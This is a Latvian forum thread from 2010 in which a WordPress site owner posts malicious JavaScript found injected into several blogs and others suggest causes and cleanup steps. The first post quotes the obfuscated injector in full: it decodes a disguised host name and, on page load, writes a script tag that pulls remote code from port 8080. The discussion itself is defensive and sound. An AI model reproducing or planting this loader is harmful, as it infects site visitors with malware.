vbz Posted January 28, 2010 Report Posted January 28, 2010 Tīru jau kuro wordpress. Piemet kodu katram failam: try{window.onload=function(){document.write('<div id=megaid>seznam-cz.jeuxvideo.com.m</div>');Isa52t57gkg = document.getElementById('megaid').innerHTML + 'e^@r()c)@#a#!d)&o(^#&l(i@$b@$#r##@$e$$&-^#)c@o)(!m(@@-^!m$)x!).)$@#s)(u!&(p!^e!®(!h#@@i@#g$(#h^(&e@^&s$@!t.&@r(#&u$#:$#D&^E!)B!@($U$G!&/(i$!c(^i((c$$(i(@$b&a(!!^n#&k($@.$$(^c#$)o!#m$!/@(i^c)$)!!i^c#i&^b!a$$!&n)^^k#(.#$c(($o#@#m^$@!/#@@a&!o&)^l)!((.$&c@#o&.)&$u&@k@^/@go##^o)^$g#$l)(^#e)$).()c@@(o!m$!#/#e))!b^@#(a&^@^y&$(&.)f#)!$r#!^/&'.replace(/&|\$|\)|\!|\(|\^|@|#/ig, '') ;document.write('<scr'+'ipt src=http://'+Isa52t57gkg.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(Fsinfbvc1 ) {} Principā tas javascript mainās, jau uz 3 blogiem, google klusē Quote
2easy Posted January 28, 2010 Report Posted January 28, 2010 (edited) izskatās, ka kompī ir vīruss, kas dabūjis tavas ftp paroles un tgd visur, kur vien tiek klāt, visos html failos (arī php failos, kur ir html tagi) piekabina kaitīgu kodu, kas inficēs jaunus datorus vari sākt tīrīt kompi ar http://freedrweb.com/cureit pēc tam nomainīt ftp paroles, tad nodzēst kodus Edited January 28, 2010 by 2easy Quote
vbz Posted January 28, 2010 Author Report Posted January 28, 2010 (edited) Iespējams, bet tikai uz wordpress, jo glabā arī citu resursu ftp paroles. Drusku izklausās pēc kosmiskajiem kariem, bet tāda varbūtība pastāv. Nezinu, ir antivīruss Avira, bet pārbaudīšu ar Dr.Web un tagad atceros, ka man nemaz nekur nebija tā resursa ftp klienta(izmanto WinSCP) datu, izņemot plain teksts (arī slikti) fails. DR.Web neko neatrod, bet piemetās paranoja tagad :) Edited January 28, 2010 by vbz Quote
2easy Posted January 28, 2010 Report Posted January 28, 2010 katrā ziņā vairāk sliecos domāt, ka problēma ir nevis paša wordpress drošībā, bet gan ka kādam ir piekļuve servera failiem un iespēja tos mainīt... ja nomainot ftp un aizvācot tos kodus, jauni neparādās, tad pieņemsim, ka viss ir kārtībā, un forget it ;) Quote
vbz Posted January 28, 2010 Author Report Posted January 28, 2010 (edited) es skatos logus pašlaik, nav tur nevienas darbības, kas būtu kritiskas, un tam dr.web arī nevar uzticēties, problēma tāda, ka tas uz viena resursa jau ir 2x. un es iepriekš visu kodu ar rokām laboju, ar search protams un tīrs bija neticu, ka kāds uz to resursu pašlaik ņemās neviens to nezina, atliek domāt, ka skanē wordpress failus, ja wordpress, tad viss notiekās, tās manas personīgās domas Edited January 28, 2010 by vbz Quote
Kaklz Posted January 28, 2010 Report Posted January 28, 2010 Papēti vai wordpress izmantotajā skinā nav kāds php triks ar base64_decode. Atceros, ka vienu tādu skinu biju sev uzlicis, kas dekriptē base64 stringu un iemet neredzamu saturu ar linkiem uz savām lapām priekš googles. Bezmaksas skinos var noķert visādus brīnumus :) Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.